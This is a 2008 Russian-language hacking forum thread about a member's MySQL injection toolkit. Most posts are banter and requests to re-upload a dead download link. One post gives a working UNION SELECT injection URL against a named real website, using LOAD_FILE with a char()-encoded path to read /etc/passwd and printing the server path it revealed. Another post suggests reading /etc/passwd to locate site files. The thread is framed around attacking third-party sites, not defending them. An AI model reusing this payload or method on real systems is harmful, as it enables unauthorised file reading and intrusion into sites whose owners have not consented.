Toolkit для работы с mysql inj от меня

Discussion in 'PHP' started by Piflit, 2 Feb 2008.

  1. Sleep

    Sleep Elder - Старейшина

    Joined:
    31 Oct 2007
    Messages:
    274
    Likes Received:
    65
    Reputations:
    4
    путь самому прописывать в форму
    а полный путь до сайта на серве можно поглядеть в файле etc/passwd
    еще не разу не видал чтобы чтение passwd было запрещено
     
  2. Piflit

    Piflit Banned

    Joined:
    11 Aug 2006
    Messages:
    1,249
    Likes Received:
    585
    Reputations:
    31
    а можно в адресную строку. и нажать enter. и все

    может ты даже скажешь, как?)
     
  3. Sleep

    Sleep Elder - Старейшина

    Joined:
    31 Oct 2007
    Messages:
    274
    Likes Received:
    65
    Reputations:
    4
    к тому же чаще всего при скуле полный путь до скрипта выводится в ошибке
    вот пример чтения файла `/etc/passwd`
    PHP:
    http://www.hardvision.ru/?dir=news&action=internet&id=-1+union+select+1,2,3,LOAD_FILE(char(47,101,116,99,47,112,97,115,115,119,100)),5,6,7,8/*
    /home/site/hardvision.ru/
     
    #23 Sleep, 10 Mar 2008
    Last edited: 10 Mar 2008
  4. guest3297

    guest3297 Banned

    Joined:
    27 Jun 2006
    Messages:
    1,246
    Likes Received:
    639
    Reputations:
    817
    бугога сори не удиржался....
     
  5. Piflit

    Piflit Banned

    Joined:
    11 Aug 2006
    Messages:
    1,249
    Likes Received:
    585
    Reputations:
    31
    +1

    Sleep явно не в теме
     
  6. heks

    heks Banned

    Joined:
    24 Aug 2007
    Messages:
    713
    Likes Received:
    95
    Reputations:
    12

    С чего бы это не в теме? на счет LOAD_FILE это он прав. Надо добавить а как человек путь определит это его уже проблема. (пути можно определить и через другие сайты хотящиеся на этом сервере.)
     
  7. Piflit

    Piflit Banned

    Joined:
    11 Aug 2006
    Messages:
    1,249
    Likes Received:
    585
    Reputations:
    31
    load_file был добавлен в последней версии. следите за обновлениями
     
  8. NOAkill

    NOAkill New Member

    Joined:
    15 Mar 2008
    Messages:
    5
    Likes Received:
    0
    Reputations:
    0
    Всем респект. Хотелось бы всё-же увидеть данный скрипт. Ссылка вроде битая. Может кто в курсе, где можно слить?
     
  9. [dword]

    [dword] Elder - Старейшина

    Joined:
    11 Apr 2007
    Messages:
    109
    Likes Received:
    74
    Reputations:
    40
    Ссылка не битая, но перекинул сюда http://dump.ru/file_catalog/1024852
     
  10. diehard

    diehard Elder - Старейшина

    Joined:
    30 Sep 2007
    Messages:
    442
    Likes Received:
    266
    Reputations:
    15
    Можно как-нибудь перезалить сабж?
     
    1 person likes this.
  11. Велемир

    Joined:
    19 Jun 2006
    Messages:
    1,123
    Likes Received:
    96
    Reputations:
    -25
    Перезалей
     
  12. lexa

    lexa Elder - Старейшина

    Joined:
    14 Jan 2005
    Messages:
    75
    Likes Received:
    11
    Reputations:
    -2
    да кстати, линк на скриптик мертв.
     
  13. diehard

    diehard Elder - Старейшина

    Joined:
    30 Sep 2007
    Messages:
    442
    Likes Received:
    266
    Reputations:
    15
    чем лучше СИПТа?
     
  14. GrAmOzEkA

    GrAmOzEkA Elder - Старейшина

    Joined:
    25 Jun 2006
    Messages:
    234
    Likes Received:
    76
    Reputations:
    29
    ссылки сдохли, перезалейте.
     
Loading...
Similar Threads - Toolkit работы mysql
  1. GAiN
    Replies:
    3
    Views:
    7,205